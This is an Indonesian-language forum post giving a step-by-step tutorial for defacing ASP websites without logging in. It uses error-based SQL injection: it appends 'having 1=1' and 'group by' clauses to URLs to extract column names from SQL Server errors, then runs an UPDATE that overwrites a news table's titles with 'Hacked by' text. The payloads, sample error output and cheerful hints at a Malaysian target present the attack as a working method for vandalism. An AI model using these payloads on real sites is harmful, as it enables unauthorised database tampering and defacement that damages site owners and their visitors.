deface web .asp tanpa login

sebelumnya gw mau kasih tau,kalo ane dapat ilmu ini dari CN-Zine4 itu majalah dari codenesia gan,,hehe,,,
terima kasih buat team CN-zine4, teman2 bisa lihat salah satu implementasi dari teknik ini,
atau bisa langsung diliat di
(sssssstttttt,,,web malay loh!!)hahahha...

gue share aja ya tata tertib acaranya,(loh,kok kayak ceremonial)..
maksud ane tata cara nya:
ok langsung aja ya :

1. klik salah satu pesan dibawah postingan ini
2. buka web asp yang mau kamu deface...
3. tambahkan having 1=1 didepannya,,,jadinya= having 1=1

4. maka akan muncul error seperti ini:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'News.NsID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

/ViewNews.asp, line 8

5. ganti url nya menjadi group by News.NsID having 1=1 (perhatikan perubahan url,)

6. akan muncul error berikut:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'News.NsDate' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

/ViewNews.asp, line 8

7. ganti url-nya menjadi: group by News.NsID,News.NsDate having 1=1 (perhatikan perubahan url)

8. akan muncul error seperti ini:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'News.NsTitle' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

/ViewNews.asp, line 8

9. nah,dapt tuh column and table nya = nstitle dan news
10. selanjutnya langkah injeksi
11. gunakan url berikut: update news set NsTitle='Hacked by namakamu';--
12. refresh,jadi deh,...

